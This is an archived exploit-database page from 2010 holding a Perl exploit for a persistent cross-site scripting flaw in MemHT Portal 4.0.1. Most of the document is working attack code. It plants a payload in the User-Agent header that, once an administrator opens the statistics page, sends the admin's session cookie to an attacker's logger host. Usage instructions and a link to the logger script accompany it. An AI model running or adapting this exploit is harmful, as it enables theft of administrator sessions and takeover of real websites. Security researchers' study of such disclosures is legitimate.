[webapps / 0day] - MemHT Portal 4.0.1 [user agent] Persisten
Posted on 27 November 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting by ZonTa in webapps / 0day | Inj3ct0r 1337 - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var _gaq = _gaq || [];_gaq.push(["_setAccount", "UA-12725838-1"]);_gaq.push(["_setDomainName", "none"]);_gaq.push(["_setAllowLinker", true]);_gaq.push(["_trackPageview"]);(function(){var ga = document.createElement("script"); ga.type = "text/javascript"; ga.async = true;ga.src = ("https:" == document.location.protocol ? "https://ssl" : "http://www") + ".google-analytics.com/ga.js";var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(ga, s);})();</script></head><body><pre>=============================================================== MemHT Portal 4.0.1 [user agent] Persistent Cross Site Scripting =============================================================== #!/usr/bin/perl # MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability [user agent] # by ZonTa - zontahackers[at]gmail[dot]com # # After successful inject wait for the admin to view statistic page. # Fix is available : http://www.memht.com/news_149_MemHT-Portal-4-0-2.html use Getopt::Std; use Digest::MD5('md5_hex'); use LWP::UserAgent; my ($host,$id,$username,$password,$logger) = @ARGV; my $http = new LWP::UserAgent; my $u_agent = "]"</td></tr><BODY ONLOAD=document.location="http://$logger?cookie="+document.cookie+"&redirect=http://$host">"; my $cookies = "login_user=$id#".md5_hex($username)."#".md5_hex($password); Main::Exploit(); package Main; sub Exploit { if (@ARGV != 5) { Main::Usage(); } else { HTTP::UserAgent($u_agent); MemHT::Login(); } } sub Usage { return print <<EOF; +-------------------------------------------------------------------+ | MemHT Portal 4.0.1 Persistent Cross Site Scripting Vulnerability | +-------------------------[user agent]------------------------------+ by ZonTa - zontahackers[at]gmail[dot]com Usage: perl exploit.pl host/path userId user pass logger[OPTIONS] host: target host and memht path userId: user id user: valid username pass: valid password logger: PHP loging file Example: perl exploit.pl localhost/memht 2 foo secret 192.168.1.5/logger.php Download Logger.php -> http://pastebin.com/K6E9AWrC EOF } package MemHT; sub Login { HTTP::Cookies($cookies); my $response = HTTP::GET($host.'/index.php?page=pvtmsg&op=newMessage'); if ($response->content =~ /access denied/i) { print "Login Failed! "; exit; } else { print "Logged In! "; print "XSS injected !"; } } package HTTP; sub UserAgent { return $http->agent($_[0]); } sub Cookies { return $http->default_header('Cookie' => $_[0]); } sub GET { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->get('http://'.$_[0]); } else { return $http->get($_[0]); } } sub POST { if ($_[0] !~ m{^http://(.+?)$}i) { return $http->post('http://'.$_[0]); } else { return $http->post($_[0]); } } sub http_header { return $http->default_header($_[0]); } # Greetz to Sri Lankans # <a href='http://1337db.com/'>1337db.com</a> [2010-11-27]</pre></body></html>
